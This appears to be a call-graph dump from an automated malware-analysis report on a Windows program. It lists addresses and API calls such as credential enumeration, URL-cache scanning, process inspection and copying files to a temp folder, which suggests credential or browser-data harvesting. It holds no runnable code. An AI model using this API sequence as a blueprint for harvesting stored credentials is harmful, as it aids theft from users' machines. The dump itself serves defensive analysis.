38161 444728 DeleteObject 38159->38161 38171 409cc3 38160->38171 38161->38160 38163 412551 38164 4010f9 38163->38164 38165 401130 38164->38165 38166 401134 GetModuleHandleW LoadIconW 38165->38166 38167 401107 wcsncat 38165->38167 38168 40a7be 38166->38168 38167->38165 38169 40a7d2 38168->38169 38169->38093 38169->38169 38170->38085 38174 409bfd memset wcscpy 38171->38174 38173 409cdb CreateFontIndirectW 38173->38163 38174->38173 38175->38102 38177 40aa14 38176->38177 38178 40aa0a ??3@YAXPAX 38176->38178 38177->38108 38178->38177 38180 40a8eb 38179->38180 38181 40a8df wcslen 38179->38181 38182 40a906 ??3@YAXPAX 38180->38182 38183 40a90f 38180->38183 38181->38180 38184 40a919 38182->38184 38185 4099f4 3 API calls 38183->38185 38186 40a932 38184->38186 38187 40a929 ??3@YAXPAX 38184->38187 38185->38184 38189 4099f4 3 API calls 38186->38189 38188 40a93e memcpy 38187->38188 38188->38102 38190 40a93d 38189->38190 38190->38188 38192 409a41 38191->38192 38193 4099fb malloc 38191->38193 38192->38102 38195 409a37 38193->38195 38196 409a1c 38193->38196 38195->38102 38197 409a30 ??3@YAXPAX 38196->38197 38198 409a20 memcpy 38196->38198 38197->38195 38198->38197 38200 40a9e7 38199->38200 38201 40a9dc ??3@YAXPAX 38199->38201 38202 4099f4 3 API calls 38200->38202 38203 40a9f2 38201->38203 38202->38203 38203->38107 38228 409bca GetModuleFileNameW 38204->38228 38206 40dce6 wcsrchr 38207 40dcf5 38206->38207 38208 40dcf9 wcscat 38206->38208 38207->38208 38208->38114 38229 44db70 38209->38229 38213 40dbfd 38232 4447d9 38213->38232 38216 40dc34 wcscpy wcscpy 38258 40d6f5 38216->38258 38217 40dc1f wcscpy 38217->38216 38220 40d6f5 3 API calls 38221 40dc73 38220->38221 38222 40d6f5 3 API calls 38221->38222 38223 40dc89 38222->38223 38224 40d6f5 3 API calls 38223->38224 38225 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38224->38225 38264 40da80 38225->38264 38228->38206 38230 40dbb4 memset memset 38229->38230 38231 409bca GetModuleFileNameW 38230->38231 38231->38213 38234 4447f4 38232->38234 38233 40dc1b 38233->38216 38233->38217 38234->38233 38235 444807 ??2@YAPAXI 38234->38235 38236 44481f 38235->38236 38237 444873 _snwprintf 38236->38237 38238 4448ab wcscpy 38236->38238 38271 44474a 8 API calls 38237->38271 38240 4448bb 38238->38240 38272 44474a 8 API calls 38240->38272 38241 4448a7 38241->38238 38241->38240 38243 4448cd 38273 44474a 8 API calls 38243->38273 38245 4448e2 38274 44474a 8 API calls 38245->38274 38247 4448f7 38275 44474a 8 API calls 38247->38275 38249 44490c 38276 44474a 8 API calls 38249->38276 38251 444921 38277 44474a 8 API calls 38251->38277 38253 444936 38278 44474a 8 API calls 38253->38278 38255 44494b 38279 44474a 8 API calls 38255->38279 38257 444960 ??3@YAXPAX 38257->38233 38259 44db70 38258->38259 38260 40d702 memset GetPrivateProfileStringW 38259->38260 38261 40d752 38260->38261 38262 40d75c WritePrivateProfileStringW 38260->38262 38261->38262 38263 40d758 38261->38263 38262->38263 38263->38220 38265 44db70 38264->38265 38266 40da8d memset 38265->38266 38267 40daac LoadStringW 38266->38267 38268 40dac6 38267->38268 38268->38267 38269 40dade 38268->38269 38280 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38268->38280 38269->38042 38271->38241 38272->38243 38273->38245 38274->38247 38275->38249 38276->38251 38277->38253 38278->38255 38279->38257 38280->38268 38291 409b98 GetFileAttributesW 38281->38291 38283 40daea 38284 40daef wcscpy wcscpy GetPrivateProfileIntW 38283->38284 38290 40db63 38283->38290 38292 40d65d GetPrivateProfileStringW 38284->38292 38286 40db3e 38293 40d65d GetPrivateProfileStringW 38286->38293 38288 40db4f 38294 40d65d GetPrivateProfileStringW 38288->38294 38290->38044 38291->38283 38292->38286 38293->38288 38294->38290 38331 40eaff 38295->38331 38299 411ae2 memset 38298->38299 38300 411b8f 38298->38300 38371 409bca GetModuleFileNameW 38299->38371 38312 411a8b 38300->38312 38302 411b0a wcsrchr 38303 411b22 wcscat 38302->38303 38304 411b1f 38302->38304 38372 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38303->38372 38304->38303 38306 411b67 38373 402afb 38306->38373 38310 411b7f 38429 40ea13 SendMessageW memset SendMessageW 38310->38429 38313 402afb 27 API calls 38312->38313 38314 411ac0 38313->38314 38315 4110dc 38314->38315 38316 41113e 38315->38316 38322 4110f0 38315->38322 38490 40969c LoadCursorW SetCursor 38316->38490 38318 411143 38491 4032b4 38318->38491 38509 40b1ab ??3@YAXPAX ??3@YAXPAX 38318->38509 38510 444a54 38318->38510 38319 4110f7 _wcsicmp 38319->38322 38320 411157 38321 40ada2 _wcsicmp 38320->38321 38325 411167 38321->38325 38322->38316 38322->38319 38513 410c46 10 API calls 38322->38513 38323 4111af 38325->38323 38326 4111a6 qsort 38325->38326 38326->38323 38330->38126 38332 40eb10 38331->38332 38344 40e8e0 38332->38344 38335 40eb6c memcpy memcpy 38336 40ebb7 38335->38336 38336->38335 38337 40ebf2 ??2@YAPAXI ??2@YAPAXI 38336->38337 38339 40d134 16 API calls 38336->38339 38338 40ec65 38337->38338 38340 40ec2e ??2@YAPAXI 38337->38340 38354 40ea7f 38338->38354 38339->38336 38340->38338 38343 402f49 38343->38126 38345 40e8f2 38344->38345 38346 40e8eb ??3@YAXPAX 38344->38346 38347 40e900 38345->38347 38348 40e8f9 ??3@YAXPAX 38345->38348 38346->38345 38349 40e911 38347->38349 38350 40e90a ??3@YAXPAX 38347->38350 38348->38347 38351 40e931 ??2@YAPAXI ??2@YAPAXI 38349->38351 38352 40e921 ??3@YAXPAX 38349->38352 38353 40e92a ??3@YAXPAX 38349->38353 38350->38349 38351->38335 38352->38353 38353->38351 38355 40aa04 ??3@YAXPAX 38354->38355 38356 40ea88 38355->38356 38357 40aa04 ??3@YAXPAX 38356->38357 38358 40ea90 38357->38358 38359 40aa04 ??3@YAXPAX 38358->38359 38360 40ea98 38359->38360 38361 40aa04 ??3@YAXPAX 38360->38361 38362 40eaa0 38361->38362 38363 40a9ce 4 API calls 38362->38363 38364 40eab3 38363->38364 38365 40a9ce 4 API calls 38364->38365 38366 40eabd 38365->38366 38367 40a9ce 4 API calls 38366->38367 38368 40eac7 38367->38368 38369 40a9ce 4 API calls 38368->38369 38370 40ead1 38369->38370 38370->38343 38371->38302 38372->38306 38430 40b2cc 38373->38430 38375 402b0a 38376 40b2cc 27 API calls 38375->38376 38377 402b23 38376->38377 38378 40b2cc 27 API calls 38377->38378 38379 402b3a 38378->38379 38380 40b2cc 27 API calls 38379->38380 38381 402b54 38380->38381 38382 40b2cc 27 API calls 38381->38382 38383 402b6b 38382->38383 38384 40b2cc 27 API calls 38383->38384 38385 402b82 38384->38385 38386 40b2cc 27 API calls 38385->38386 38387 402b99 38386->38387 38388 40b2cc 27 API calls 38387->38388 38389 402bb0 38388->38389 38390 40b2cc 27 API calls 38389->38390 38391 402bc7 38390->38391 38392 40b2cc 27 API calls 38391->38392 38393 402bde 38392->38393 38394 40b2cc 27 API calls 38393->38394 38395 402bf5 38394->38395 38396 40b2cc 27 API calls 38395->38396 38397 402c0c 38396->38397 38398 40b2cc 27 API calls 38397->38398 38399 402c23 38398->38399 38400 40b2cc 27 API calls 38399->38400 38401 402c3a 38400->38401 38402 40b2cc 27 API calls 38401->38402 38403 402c51 38402->38403 38404 40b2cc 27 API calls 38403->38404 38405 402c68 38404->38405 38406 40b2cc 27 API calls 38405->38406 38407 402c7f 38406->38407 38408 40b2cc 27 API calls 38407->38408 38409 402c99 38408->38409 38410 40b2cc 27 API calls 38409->38410 38411 402cb3 38410->38411 38412 40b2cc 27 API calls 38411->38412 38413 402cd5 38412->38413 38414 40b2cc 27 API calls 38413->38414 38415 402cf0 38414->38415 38416 40b2cc 27 API calls 38415->38416 38417 402d0b 38416->38417 38418 40b2cc 27 API calls 38417->38418 38419 402d26 38418->38419 38420 40b2cc 27 API calls 38419->38420 38421 402d3e 38420->38421 38422 40b2cc 27 API calls 38421->38422 38423 402d59 38422->38423 38424 40b2cc 27 API calls 38423->38424 38425 402d78 38424->38425 38426 40b2cc 27 API calls 38425->38426 38427 402d93 38426->38427 38428 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38427->38428 38428->38310 38429->38300 38433 40b58d 38430->38433 38432 40b2d1 38432->38375 38434 40b5a4 GetModuleHandleW FindResourceW 38433->38434 38435 40b62e 38433->38435 38436 40b5c2 LoadResource 38434->38436 38438 40b5e7 38434->38438 38435->38432 38437 40b5d0 SizeofResource LockResource 38436->38437 38436->38438 38437->38438 38438->38435 38446 40afcf 38438->38446 38440 40b608 memcpy 38449 40b4d3 38440->38449 38447 40b04b ??3@YAXPAX 38446->38447 38448 40afd7 ??2@YAPAXI 38447->38448 38448->38440 38450 40b4ec 38449->38450 38451 40b584 38450->38451 38452 40b563 memcpy 38450->38452 38453 40b3c1 38451->38453 38452->38450 38452->38451 38454 44db70 38453->38454 38455 40b3ce memset 38454->38455 38456 40b3fa 38455->38456 38458 40b403 wcschr 38456->38458 38459 40b448 38456->38459 38475 40a5d0 38456->38475 38458->38456 38460 40b417 _wtoi 38458->38460 38462 40b04b 38459->38462 38465 40b2f5 38460->38465 38463 40b051 ??3@YAXPAX 38462->38463 38464 40b05f 38462->38464 38463->38464 38464->38435 38466 40b302 38465->38466 38479 40b1d1 wcslen 38466->38479 38468 40b319 memset WideCharToMultiByte 38489 40b0d1 7 API calls 38468->38489 38470 40b35a 38471 40b377 38470->38471 38472 40b369 ??3@YAXPAX 38470->38472 38474 40b391 38470->38474 38473 4099f4 3 API calls 38471->38473 38472->38474 38473->38474 38474->38456 38476 40a5e9 38475->38476 38477 40a5e5 38475->38477 38476->38477 38478 40a61e memcpy 38476->38478 38477->38456 38478->38477 38480 40b208 38479->38480 38481 40b1ff ??3@YAXPAX 38479->38481 38483 4099f4 3 API calls 38480->38483 38482 40b212 38481->38482 38484 40b222 ??3@YAXPAX 38482->38484 38485 40b22b 38482->38485 38483->38482 38486 40b237 memcpy 38484->38486 38487 4099f4 3 API calls 38485->38487 38486->38468 38488 40b236 38487->38488 38488->38486 38489->38470 38490->38318 38492 4032c4 38491->38492 38493 40b633 ??3@YAXPAX 38492->38493 38494 403316 38493->38494 38514 44553b 38494->38514 38498 40333c 38499 403480 38498->38499 38504 4033a9 memset memcpy 38498->38504 38505 4033ec wcscmp 38498->38505 38708 4028e7 11 API calls 38498->38708 38709 40f508 6 API calls 38498->38709 38710 40368c 15 API calls 38499->38710 38501 403489 38502 40b633 ??3@YAXPAX 38501->38502 38503 403495 38502->38503 38503->38320 38504->38498 38504->38505 38505->38498 38507 403421 _wcsicmp 38507->38498 38509->38320 38511 444a64 FreeLibrary 38510->38511 38512 444a83 38510->38512 38511->38512 38512->38320 38513->38322 38515 445548 38514->38515 38516 445599 38515->38516 38711 40c768 38515->38711 38517 4455a8 memset 38516->38517 38525 4457f2 38516->38525 38794 403988 38517->38794 38524 4458aa 38527 44594a 38524->38527 38528 4458bb memset memset 38524->38528 38534 445854 38525->38534 38847 403e2d memset memset memset memset memset 38525->38847 38526 445672 38807 403fbe memset memset memset memset memset 38526->38807 38530 4459ed 38527->38530 38531 44595e memset memset 38527->38531 38533 414c2e 16 API calls 38528->38533 38536 445a00 memset memset 38530->38536 38537 445b22 38530->38537 38538 414c2e 16 API calls 38531->38538 38532 4455e5 38532->38526 38546 44560f 38532->38546 38539 4458f9 38533->38539 38534->38524 38870 403c9c memset memset memset memset memset 38534->38870 38543 414c2e 16 API calls 38536->38543 38547 445b38 memset memset memset 38537->38547 38684 445bca 38537->38684 38544 44599c 38538->38544 38545 40b2cc 27 API calls 38539->38545 38550 445a3e 38543->38550 38552 40b2cc 27 API calls 38544->38552 38553 445909 38545->38553 38923 4087b3 338 API calls 38546->38923 38558 445bd4 38547->38558 38559 445b98 38547->38559 38548 445849 38942 40b1ab ??3@YAXPAX ??3@YAXPAX 38548->38942 38562 40b2cc 27 API calls 38550->38562 38569 4459ac 38552->38569 38566 409d1f 6 API calls 38553->38566 38554 445c8b memset memset 38570 414c2e 16 API calls 38554->38570 38557 44589f 38944 40b1ab ??3@YAXPAX ??3@YAXPAX 38557->38944 38893 414c2e 38558->38893 38559->38558 38560 445ba2 38559->38560 39036 4099c6 wcslen 38560->39036 38561 4456b2 38928 40b1ab ??3@YAXPAX ??3@YAXPAX 38561->38928 38574 445a4f 38562->38574 38565 403335 38707 4452e5 45 API calls 38565->38707 38579 445919 38566->38579 38567 445621 38924 4454bf 20 API calls 38567->38924 38568 445823 38568->38548 38941 4087b3 338 API calls 38568->38941 38580 409d1f 6 API calls 38569->38580 38581 445cc9 38570->38581 38572 445879 38572->38557 38943 4087b3 338 API calls 38572->38943 38585 409d1f 6 API calls 38574->38585 38577 445d3d 38605 40b2cc 27 API calls 38577->38605 38578 445d88 memset memset memset 38589 414c2e 16 API calls 38578->38589 38945 409b98 GetFileAttributesW 38579->38945 38590 4459bc 38580->38590 38582 409d1f 6 API calls 38581->38582 38591 445ce1 38582->38591 38583 445bb3 39039 445403 memset 38583->39039 38584 445680 38584->38561 38927 4087b3 338 API calls 38584->38927 38594 445a63 38585->38594 38586 40b2cc 27 API calls 38595 445bf3 38586->38595 38598 445dde 38589->38598 39012 409b98 GetFileAttributesW 38590->39012 39056 409b98 GetFileAttributesW 38591->39056 38603 40b2cc 27 API calls 38594->38603 38908 409d1f wcslen wcslen 38595->38908 38596 445928 38596->38527 38946 40b6ef 38596->38946 38606 40b2cc 27 API calls 38598->38606 38610 445a94 38603->38610 38613 445d54 _wcsicmp 38605->38613 38616 445def 38606->38616 38607 4459cb 38607->38530 38617 40b6ef 252 API calls 38607->38617 38608 445cf0 38608->38565 38608->38577 38608->38578 38609 445389 258 API calls 38609->38684 39013 40ae18 38610->39013 38611 44566d 38611->38525 38830 413d4c 38611->38830 38621 445d67 38613->38621 38622 445d71 38613->38622 38615 445665 38926 40b1ab ??3@YAXPAX ??3@YAXPAX 38615->38926 38623 409d1f 6 API calls 38616->38623 38617->38530 38621->38565 38630 40b6ef 252 API calls 38621->38630 39057 445093 23 API calls 38622->39057 38629 445e03 38623->38629 38625 4456d8 38631 40b2cc 27 API calls 38625->38631 38628 44563c 38628->38615 38925 4087b3 338 API calls 38628->38925 39058 409b98 GetFileAttributesW 38629->39058 38630->38565 38636 4456e2 38631->38636 38632 40b2cc 27 API calls 38637 445c23 38632->38637 38633 445d83 38633->38565 38929 413fa6 _wcsicmp _wcsicmp 38636->38929 38641 409d1f 6 API calls 38637->38641 38639 445e12 38645 445e6b 38639->38645 38646 40b2cc 27 API calls 38639->38646 38643 445c37 38641->38643 38642 4456eb 38649 4456fd memset memset memset memset 38642->38649 38650 4457ea 38642->38650 38651 445389 258 API calls 38643->38651 38644 445b17 39033 40aebe 38644->39033 39060 445093 23 API calls 38645->39060 38653 445e33 38646->38653 38930 409c70 wcscpy wcsrchr 38649->38930 38934 413d29 38650->38934 38657 445c47 38651->38657 38658 409d1f 6 API calls 38653->38658 38655 445e7e 38659 445f67 38655->38659 38662 40b2cc 27 API calls 38657->38662 38663 445e47 38658->38663 38664 40b2cc 27 API calls 38659->38664 38660 445ab2 memset 38665 40b2cc 27 API calls 38660->38665 38667 445c53 38662->38667 39059 409b98 GetFileAttributesW 38663->39059 38669 445f73 38664->38669 38670 445aa1 38665->38670 38666 409c70 2 API calls 38671 44577e 38666->38671 38672 409d1f 6 API calls 38667->38672 38674 409d1f 6 API calls 38669->38674 38670->38644 38670->38660 38675 409d1f 6 API calls 38670->38675 38683 445389 258 API calls 38670->38683 39020 40add4 38670->39020 39025 40ae51 38670->39025 38676 409c70 2 API calls 38671->38676 38677 445c67 38672->38677 38673 445e56 38673->38645 38681 445e83 memset 38673->38681 38678 445f87 38674->38678 38675->38670 38679 44578d 38676->38679 38680 445389 258 API calls 38677->38680 39063 409b98 GetFileAttributesW 38678->39063 38679->38650 38686 40b2cc 27 API calls 38679->38686 38680->38684 38685 40b2cc 27 API calls 38681->38685 38683->38670 38684->38554 38684->38608 38687 445eab 38685->38687 38688 4457a8 38686->38688 38689 409d1f 6 API calls 38687->38689 38690 409d1f 6 API calls 38688->38690 38691 445ebf 38689->38691 38692 4457b8 38690->38692 38693 40ae18 9 API calls 38691->38693 38932 409b98 GetFileAttributesW 38692->38932 38703 445ef5 38693->38703 38695 4457c7 38695->38650 38933 4087b3 338 API calls 38695->38933 38697 40ae51 9 API calls 38697->38703 38698 445f5c 38699 40aebe FindClose 38698->38699 38699->38659 38700 40add4 2 API calls 38700->38703 38701 40b2cc 27 API calls 38701->38703 38702 409d1f 6 API calls 38702->38703 38703->38697 38703->38698 38703->38700 38703->38701 38703->38702 38705 445f3a 38703->38705 39061 409b98 GetFileAttributesW 38703->39061 39062 445093 23 API calls 38705->39062 38707->38498 38708->38507 38709->38498 38710->38501 38712 40c775 38711->38712 39064 40b1ab ??3@YAXPAX ??3@YAXPAX 38712->39064 38714 40c788 39065 40b1ab ??3@YAXPAX ??3@YAXPAX 38714->39065 38716 40c790 39066 40b1ab ??3@YAXPAX ??3@YAXPAX 38716->39066 38718 40c798 38719 40aa04 ??3@YAXPAX 38718->38719 38720 40c7a0 38719->38720 39067 40c274 memset 38720->39067 38725 40a8ab 9 API calls 38726 40c7c3 38725->38726 38727 40a8ab 9 API calls 38726->38727 38728 40c7d0 38727->38728 39096 40c3c3 38728->39096 38732 40c877 38741 40bdb0 38732->38741 38733 40c86c 39138 4053fe 39 API calls 38733->39138 38739 40c7e5 38739->38732 38739->38733 38740 40c634 49 API calls 38739->38740 39121 40a706 38739->39121 38740->38739 39328 404363 38741->39328 38745 40bddf CredEnumerateW 38747 40bdee 38745->38747 38748 40b2cc 27 API calls 38747->38748 38750 40bf5d 38747->38750 38749 40be02 wcslen 38748->38749 38749->38750 38758 40be1e 38749->38758 39348 40440c 38750->39348 38751 40be26 _wcsncoll 38751->38758 38754 40be7d memset 38755 40bea7 memcpy 38754->38755 38754->38758 38756 40bf11 wcschr 38755->38756 38755->38758 38756->38758 38757 40b2cc 27 API calls 38759 40bef6 _wcsnicmp 38757->38759 38758->38750 38758->38751 38758->38754 38758->38755 38758->38756 38758->38757 38760 40bf43 LocalFree 38758->38760 39351 40bd5d 28 API calls 38758->39351 39352 404423 38758->39352 38759->38756 38759->38758 38760->38758 38761 4135f7 39365 4135e0 38761->39365 38764 40b2cc 27 API calls 38765 41360d 38764->38765 38766 40a804 8 API calls 38765->38766 38767 413613 38766->38767 38768 41361b 38767->38768 38769 41363e 38767->38769 38770 40b273 27 API calls 38768->38770 38771 4135e0 FreeLibrary 38769->38771 38795 40399d 38794->38795 39394 403a16 38795->39394 38798 4039b4 38804 4039f4 38798->38804 39406 40a02c CreateFileW GetFileTime CloseHandle 38798->39406 38799 403a0a 39405 40b1ab ??3@YAXPAX ??3@YAXPAX 38799->39405 38801 403a12 wcsrchr 38801->38532 38803 4039ca CompareFileTime 38803->38798 38804->38799 38805 4099c6 2 API calls 38804->38805 38806 403a09 38805->38806 38806->38799 38808 414c2e 16 API calls 38807->38808 38809 404048 38808->38809 38810 414c2e 16 API calls 38809->38810 38811 404056 38810->38811 38812 409d1f 6 API calls 38811->38812 38813 404073 38812->38813 38814 409d1f 6 API calls 38813->38814 38815 40408e 38814->38815 38816 409d1f 6 API calls 38815->38816 38817 4040a6 38816->38817 38818 403af5 20 API calls 38817->38818 38819 4040ba 38818->38819 38820 403af5 20 API calls 38819->38820 38821 4040cb 38820->38821 39433 40414f memset 38821->39433 38823 404140 39447 40b1ab ??3@YAXPAX ??3@YAXPAX 38823->39447 38824 4040e0 38824->38823 38826 4040ec memset 38824->38826 38828 4099c6 2 API calls 38824->38828 38829 40a8ab 9 API calls 38824->38829 38826->38824 38827 404148 38827->38584 38828->38824 38829->38824 38831 40b633 ??3@YAXPAX 38830->38831 38832 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38831->38832 38833 413f00 Process32NextW 38832->38833 38834 413da5 OpenProcess 38833->38834 38835 413f17 CloseHandle 38833->38835 38836 413df3 memset 38834->38836 38839 413eb0 38834->38839 38835->38625 39460 413f27 38836->39460 38838 413ebf ??3@YAXPAX 38838->38839 38839->38833 38839->38838 38840 4099f4 3 API calls 38839->38840 38840->38839 38841 413e37 GetModuleHandleW 38843 413e1f 38841->38843 38844 413e46 GetProcAddress 38841->38844 38843->38841 39465 413959 38843->39465 39481 413ca4 38843->39481 38844->38843 38846 413ea2 CloseHandle 38846->38839 38848 414c2e 16 API calls 38847->38848 38849 403eb7 38848->38849 38850 414c2e 16 API calls 38849->38850 38851 403ec5 38850->38851 38852 409d1f 6 API calls 38851->38852 38853 403ee2 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 403efd 38854->38855 38856 409d1f 6 API calls 38855->38856 38857 403f15 38856->38857 38858 403af5 20 API calls 38857->38858 38859 403f29 38858->38859 38860 403af5 20 API calls 38859->38860 38861 403f3a 38860->38861 38862 40414f 33 API calls 38861->38862 38868 403f4f 38862->38868 38863 403faf 39495 40b1ab ??3@YAXPAX ??3@YAXPAX 38863->39495 38864 403f5b memset 38864->38868 38866 403fb7 38866->38568 38867 4099c6 2 API calls 38867->38868 38868->38863 38868->38864 38868->38867 38869 40a8ab 9 API calls 38868->38869 38869->38868 38871 414c2e 16 API calls 38870->38871 38872 403d26 38871->38872 38873 414c2e 16 API calls 38872->38873 38874 403d34 38873->38874 38875 409d1f 6 API calls 38874->38875 38876 403d51 38875->38876 38877 409d1f 6 API calls 38876->38877 38878 403d6c 38877->38878 38879 409d1f 6 API calls 38878->38879 38880 403d84 38879->38880 38881 403af5 20 API calls 38880->38881 38882 403d98 38881->38882 38883 403af5 20 API calls 38882->38883 38884 403da9 38883->38884 38885 40414f 33 API calls 38884->38885 38891 403dbe 38885->38891 38886 403e1e 39496 40b1ab ??3@YAXPAX ??3@YAXPAX 38886->39496 38888 403dca memset 38888->38891 38889 403e26 38889->38572 38890 4099c6 2 API calls 38890->38891 38891->38886 38891->38888 38891->38890 38892 40a8ab 9 API calls 38891->38892 38892->38891 38894 414b81 9 API calls 38893->38894 38895 414c40 38894->38895 38896 414c73 memset 38895->38896 39497 409cea 38895->39497 38897 414c94 38896->38897 39500 414592 RegOpenKeyExW 38897->39500 38900 414cc1 38901 414cf4 wcscpy 38900->38901 39501 414bb0 wcscpy 38900->39501 38903 414c64 38901->38903 38903->38586 38905 414cd2 39502 4145ac RegQueryValueExW 38905->39502 38907 414ce9 RegCloseKey 38907->38901 38909 409d62 38908->38909 38910 409d43 wcscpy 38908->38910 38913 445389 38909->38913 38911 409719 2 API calls 38910->38911 38912 409d51 wcscat 38911->38912 38912->38909 38914 40ae18 9 API calls 38913->38914 38920 4453c4 38914->38920 38915 40ae51 9 API calls 38915->38920 38916 4453f3 38917 40aebe FindClose 38916->38917 38919 4453fe 38917->38919 38918 40add4 2 API calls 38918->38920 38919->38632 38920->38915 38920->38916 38920->38918 38921 445403 253 API calls 38920->38921 38921->38920 38923->38567 38924->38628 38925->38628 38926->38611 38927->38584 38928->38611 38929->38642 38931 409c89 38930->38931 38931->38666 38932->38695 38933->38650 38935 413d39 38934->38935 38936 413d2f FreeLibrary 38934->38936 38937 40b633 ??3@YAXPAX 38935->38937 38936->38935 38938 413d42 38937->38938 38939 40b633 ??3@YAXPAX 38938->38939 38940 413d4a 38939->38940 38940->38525 38941->38568 38942->38534 38943->38572 38944->38524 38945->38596 38947 44db70 38946->38947 38948 40b6fc memset 38947->38948 38949 409c70 2 API calls 38948->38949 38950 40b732 wcsrchr 38949->38950 38951 40b743 38950->38951 38952 40b746 memset 38950->38952 38951->38952 38953 40b2cc 27 API calls 38952->38953 38954 40b76f 38953->38954 38955 409d1f 6 API calls 38954->38955 38956 40b783 38955->38956 39503 409b98 GetFileAttributesW 38956->39503 38958 40b792 38959 40b7c2 38958->38959 38961 409c70 2 API calls 38958->38961 39504 40bb98 38959->39504 38963 40b7a5 38961->38963 38964 40b2cc 27 API calls 38963->38964 38967 40b7b2 38964->38967 38965 40b837 FindCloseChangeNotification 38969 40b83e memset 38965->38969 38966 40b817 39607 409a45 GetTempPathW 38966->39607 38970 409d1f 6 API calls 38967->38970 39537 40a6e6 WideCharToMultiByte 38969->39537 38970->38959 38971 40b827 CopyFileW 38971->38969 38973 40b866 39538 444432 38973->39538 38976 40bad5 38978 40baeb 38976->38978 38979 40bade DeleteFileW 38976->38979 38977 40b273 27 API calls 38980 40b89a 38977->38980 38981 40b04b ??3@YAXPAX 38978->38981 38979->38978 39584 438552 38980->39584 38983 40baf3 38981->38983 38983->38527 38985 40bacd 39587 443d90 38985->39587 38988 40bac6 39637 424f26 123 API calls 38988->39637 38989 40b8bd memset 39628 425413 17 API calls 38989->39628 38992 425413 17 API calls 39001 40b8b8 38992->39001 38995 40a71b MultiByteToWideChar 38995->39001 38998 40b9b5 memcmp 38998->39001 38999 4099c6 2 API calls 38999->39001 39000 404423 37 API calls 39000->39001 39001->38988 39001->38989 39001->38992 39001->38995 39001->38998 39001->38999 39001->39000 39004 40bb3e memset memcpy 39001->39004 39005 4251c4 137 API calls 39001->39005 39010 40ba5f memcmp 39001->39010 39011 40a734 MultiByteToWideChar 39001->39011 39629 4253ef 16 API calls 39001->39629 39630 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39001->39630 39631 4253af 17 API calls 39001->39631 39632 4253cf 17 API calls 39001->39632 39633 447280 memset 39001->39633 39634 447960 memset memcpy memcpy memcpy 39001->39634 39635 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39001->39635 39636 447920 memcpy memcpy memcpy 39001->39636 39638 40a734 MultiByteToWideChar 39004->39638 39005->39001 39010->39001 39011->39001 39012->38607 39014 40aebe FindClose 39013->39014 39015 40ae21 39014->39015 39016 4099c6 2 API calls 39015->39016 39017 40ae35 39016->39017 39018 409d1f 6 API calls 39017->39018 39019 40ae49 39018->39019 39019->38670 39021 40ade0 39020->39021 39024 40ae0f 39020->39024 39022 40ade7 wcscmp 39021->39022 39021->39024 39023 40adfe wcscmp 39022->39023 39022->39024 39023->39024 39024->38670 39026 40ae7b FindNextFileW 39025->39026 39027 40ae5c FindFirstFileW 39025->39027 39028 40ae94 39026->39028 39029 40ae8f 39026->39029 39027->39028 39030 409d1f 6 API calls 39028->39030 39032 40aeb6 39028->39032 39031 40aebe FindClose 39029->39031 39030->39032 39031->39028 39032->38670 39034 40aed1 39033->39034 39035 40aec7 FindClose 39033->39035 39034->38537 39035->39034 39037 4099d7 39036->39037 39038 4099da memcpy 39036->39038 39037->39038 39038->38583 39040 40b2cc 27 API calls 39039->39040 39041 44543f 39040->39041 39042 409d1f 6 API calls 39041->39042 39043 44544f 39042->39043 40040 409b98 GetFileAttributesW 39043->40040 39045 44545e 39046 445476 39045->39046 39047 40b6ef 252 API calls 39045->39047 39048 40b2cc 27 API calls 39046->39048 39047->39046 39049 445482 39048->39049 39050 409d1f 6 API calls 39049->39050 39051 445492 39050->39051 40041 409b98 GetFileAttributesW 39051->40041 39053 4454a1 39054 4454b9 39053->39054 39055 40b6ef 252 API calls 39053->39055 39054->38609 39055->39054 39056->38608 39057->38633 39058->38639 39059->38673 39060->38655 39061->38703 39062->38703 39063->38621 39064->38714 39065->38716 39066->38718 39068 414c2e 16 API calls 39067->39068 39069 40c2ae 39068->39069 39139 40c1d3 39069->39139 39074 40c3be 39091 40a8ab 39074->39091 39075 40afcf 2 API calls 39076 40c2fd FindFirstUrlCacheEntryW 39075->39076 39077 40c3b6 39076->39077 39078 40c31e wcschr 39076->39078 39081 40b04b ??3@YAXPAX 39077->39081 39079 40c331 39078->39079 39080 40c35e FindNextUrlCacheEntryW 39078->39080 39082 40a8ab 9 API calls 39079->39082 39080->39078 39083 40c373 GetLastError 39080->39083 39081->39074 39084 40c33e wcschr 39082->39084 39085 40c3ad FindCloseUrlCache 39083->39085 39086 40c37e 39083->39086 39084->39080 39087 40c34f 39084->39087 39085->39077 39088 40afcf 2 API calls 39086->39088 39089 40a8ab 9 API calls 39087->39089 39090 40c391 FindNextUrlCacheEntryW 39088->39090 39089->39080 39090->39078 39090->39085 39255 40a97a 39091->39255 39094 40a8cc 39094->38725 39095 40a8d0 7 API calls 39095->39094 39260 40b1ab ??3@YAXPAX ??3@YAXPAX 39096->39260 39098 40c3dd 39099 40b2cc 27 API calls 39098->39099 39100 40c3e7 39099->39100 39261 414592 RegOpenKeyExW 39100->39261 39102 40c3f4 39103 40c50e 39102->39103 39104 40c3ff 39102->39104 39118 405337 39103->39118 39105 40a9ce 4 API calls 39104->39105 39106 40c418 memset 39105->39106 39262 40aa1d 39106->39262 39109 40c471 39111 40c47a _wcsupr 39109->39111 39110 40c505 RegCloseKey 39110->39103 39112 40a8d0 7 API calls 39111->39112 39113 40c498 39112->39113 39114 40a8d0 7 API calls 39113->39114 39115 40c4ac memset 39114->39115 39116 40aa1d 39115->39116 39117 40c4e4 RegEnumValueW 39116->39117 39117->39110 39117->39111 39264 405220 39118->39264 39122 4099c6 2 API calls 39121->39122 39123 40a714 _wcslwr 39122->39123 39124 40c634 39123->39124 39321 405361 39124->39321 39127 40c65c wcslen 39324 4053b6 39 API calls 39127->39324 39128 40c71d wcslen 39128->38739 39130 40c677 39131 40c713 39130->39131 39325 40538b 39 API calls 39130->39325 39327 4053df 39 API calls 39131->39327 39134 40c6a5 39134->39131 39135 40c6a9 memset 39134->39135 39136 40c6d3 39135->39136 39326 40c589 43 API calls 39136->39326 39138->38732 39140 40ae18 9 API calls 39139->39140 39149 40c210 39140->39149 39141 40ae51 9 API calls 39141->39149 